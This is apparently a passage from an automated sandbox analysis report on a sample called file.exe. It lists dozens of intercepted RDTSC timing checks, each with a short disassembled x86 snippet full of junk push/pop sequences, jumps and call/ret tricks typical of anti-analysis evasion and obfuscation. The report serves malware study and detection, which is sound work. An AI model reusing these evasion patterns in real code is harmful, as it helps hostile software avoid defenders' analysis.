0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 jmp 00007F08C0CB452Fh 0x00000087 nop 0x00000088 pushad 0x00000089 push eax 0x0000008a jno 00007F08C0CB4526h 0x00000090 pop eax 0x00000091 push eax 0x00000092 push edx 0x00000093 jbe 00007F08C0CB4526h 0x00000099 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E1BC second address: B3E1C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E1C0 second address: B3E1D6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F08C0CB4526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F08C0CB4528h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E1D6 second address: B3E1DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E1DC second address: B3E1E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E2E0 second address: B3E2EA instructions: 0x00000000 rdtsc 0x00000002 je 00007F08C0C9195Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E533 second address: B3E537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E537 second address: B3E543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E543 second address: B3E57A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 nop 0x00000009 pushad 0x0000000a and edx, dword ptr [ebp+122D2E61h] 0x00000010 mov edx, 6C0E0EEFh 0x00000015 popad 0x00000016 push 00000000h 0x00000018 add dword ptr [ebp+122D1E1Dh], edi 0x0000001e xor edi, dword ptr [ebp+122D3051h] 0x00000024 push D6EAE8A2h 0x00000029 push eax 0x0000002a push edx 0x0000002b jno 00007F08C0CB452Ch 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E57A second address: B3E613 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F08C0C9195Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 291517DEh 0x00000011 movsx esi, bx 0x00000014 push 00000003h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F08C0C91958h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ecx 0x00000035 call 00007F08C0C91958h 0x0000003a pop ecx 0x0000003b mov dword ptr [esp+04h], ecx 0x0000003f add dword ptr [esp+04h], 00000017h 0x00000047 inc ecx 0x00000048 push ecx 0x00000049 ret 0x0000004a pop ecx 0x0000004b ret 0x0000004c mov dword ptr [ebp+122D1C0Eh], ecx 0x00000052 push 00000003h 0x00000054 ja 00007F08C0C9196Ch 0x0000005a push 78A00942h 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F08C0C9195Fh 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E613 second address: B3E61D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F08C0CB4526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E61D second address: B3E68F instructions: 0x00000000 rdtsc 0x00000002 je 00007F08C0C9196Dh 0x00000008 jmp 00007F08C0C91967h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f add dword ptr [esp], 475FF6BEh 0x00000016 movzx edi, di 0x00000019 lea ebx, dword ptr [ebp+1243E02Bh] 0x0000001f jbe 00007F08C0C91970h 0x00000025 pushad 0x00000026 call 00007F08C0C91967h 0x0000002b pop edi 0x0000002c popad 0x0000002d xchg eax, ebx 0x0000002e jmp 00007F08C0C91965h 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jng 00007F08C0C91958h 0x0000003c push edx 0x0000003d pop edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B60DE5 second address: B60DE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B34FEC second address: B34FF2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5EED3 second address: B5EED7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5EED7 second address: B5EEEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007F08C0C91958h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5EEEB second address: B5EF08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08C0CB4539h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5EF08 second address: B5EF17 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F08C0C91956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5EF17 second address: B5EF54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08C0CB4536h 0x00000009 jne 00007F08C0CB4526h 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F08C0CB452Fh 0x00000018 push eax 0x00000019 push edx 0x0000001a jnp 00007F08C0CB4526h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5EF54 second address: B5EF58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5EF58 second address: B5EF5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5EF5C second address: B5EF68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F08C0C91956h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5EF68 second address: B5EF83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08C0CB4535h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F369 second address: B5F36D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F36D second address: B5F377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F66E second address: B5F673 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F78D second address: B5F792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F792 second address: B5F7B3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F08C0C9195Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F08C0C91974h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jp 00007F08C0C91956h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F7B3 second address: B5F7BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F7BC second address: B5F7C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5FBB2 second address: B5FBEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB4537h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jng 00007F08C0CB4526h 0x00000011 jmp 00007F08C0CB452Fh 0x00000016 jnp 00007F08C0CB4526h 0x0000001c popad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5FBEE second address: B5FBF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5FDAC second address: B5FDBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08C0CB452Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B36AAA second address: B36AB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B36AB0 second address: B36AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B604C3 second address: B604C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B60641 second address: B60679 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F08C0CB453Fh 0x00000008 jmp 00007F08C0CB4539h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007F08C0CB4526h 0x00000019 jmp 00007F08C0CB452Bh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B60679 second address: B60696 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C91969h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6081C second address: B60821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B60821 second address: B6085C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F08C0C91971h 0x00000008 jne 00007F08C0C91956h 0x0000000e jmp 00007F08C0C91965h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F08C0C91966h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6085C second address: B60860 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B609CD second address: B609EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08C0C91967h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6245A second address: B6245E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B643C7 second address: B643CD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B643CD second address: B643D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B643D2 second address: B643F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08C0C91964h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B643F3 second address: B643F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B64A00 second address: B64A04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6EDC3 second address: B6EDC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6EDC7 second address: B6EDE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F08C0C91967h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6EDE4 second address: B6EDEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F08C0CB4526h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6EDEE second address: B6EDF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6EDF2 second address: B6EE11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08C0CB4531h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6EF4F second address: B6EF53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6EF53 second address: B6EF70 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jg 00007F08C0CB4526h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pushad 0x00000017 popad 0x00000018 pop edi 0x00000019 push eax 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6F43C second address: B6F472 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F08C0C91967h 0x00000008 jl 00007F08C0C91956h 0x0000000e jl 00007F08C0C91956h 0x00000014 popad 0x00000015 push eax 0x00000016 jo 00007F08C0C91956h 0x0000001c pop eax 0x0000001d pop edx 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6F472 second address: B6F478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6F478 second address: B6F47D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6F47D second address: B6F489 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F08C0CB4526h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B70C58 second address: B70C5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B70E3D second address: B70E56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB4535h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B70E56 second address: B70E6C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F08C0C9195Ch 0x00000008 jl 00007F08C0C91956h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B70E6C second address: B70E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B70E72 second address: B70E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B70E77 second address: B70E8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08C0CB4534h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B71028 second address: B7102D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7208E second address: B72098 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F08C0CB4526h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B72098 second address: B7209C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B730F3 second address: B730F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7296E second address: B72972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B730F9 second address: B730FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B73CB4 second address: B73CB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B73A24 second address: B73A28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B73CB9 second address: B73CD2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 je 00007F08C0C91956h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F08C0C9195Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B73CD2 second address: B73D2B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F08C0CB4528h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 pushad 0x00000026 push edi 0x00000027 mov ax, A92Eh 0x0000002b pop ebx 0x0000002c clc 0x0000002d popad 0x0000002e push 00000000h 0x00000030 pushad 0x00000031 mov dword ptr [ebp+122D1FA1h], edi 0x00000037 jmp 00007F08C0CB452Fh 0x0000003c popad 0x0000003d xchg eax, ebx 0x0000003e push edx 0x0000003f push edi 0x00000040 pushad 0x00000041 popad 0x00000042 pop edi 0x00000043 pop edx 0x00000044 push eax 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 push edi 0x00000049 pop edi 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B75B98 second address: B75BB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F08C0C9195Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7B22C second address: B7B261 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F08C0CB452Ch 0x00000008 je 00007F08C0CB4526h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 push 00000000h 0x00000013 movsx ebx, cx 0x00000016 push 00000000h 0x00000018 sub bx, C70Bh 0x0000001d mov bh, F1h 0x0000001f xchg eax, esi 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F08C0CB4532h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7B261 second address: B7B295 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007F08C0C91969h 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007F08C0C9195Bh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7C1F0 second address: B7C1F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7C1F4 second address: B7C1FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7C1FA second address: B7C200 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7C200 second address: B7C204 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B764E5 second address: B764F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08C0CB4530h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7E217 second address: B7E28E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C9195Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a ja 00007F08C0C91964h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F08C0C91958h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d clc 0x0000002e push 00000000h 0x00000030 mov bh, 3Eh 0x00000032 xchg eax, esi 0x00000033 pushad 0x00000034 jmp 00007F08C0C91963h 0x00000039 jmp 00007F08C0C9195Ch 0x0000003e popad 0x0000003f push eax 0x00000040 pushad 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7E28E second address: B7E297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7C447 second address: B7C44C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7C44C second address: B7C45F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08C0CB452Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B800A4 second address: B800A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B800A8 second address: B800AE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B811A0 second address: B811EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dword ptr [esp], eax 0x00000008 movsx ebx, di 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F08C0C91958h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 xchg eax, esi 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F08C0C91963h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B811EA second address: B81212 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB452Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F08C0CB4535h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B81212 second address: B81227 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C91961h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B81227 second address: B81231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F08C0CB4526h 0x0000000a rdtsc
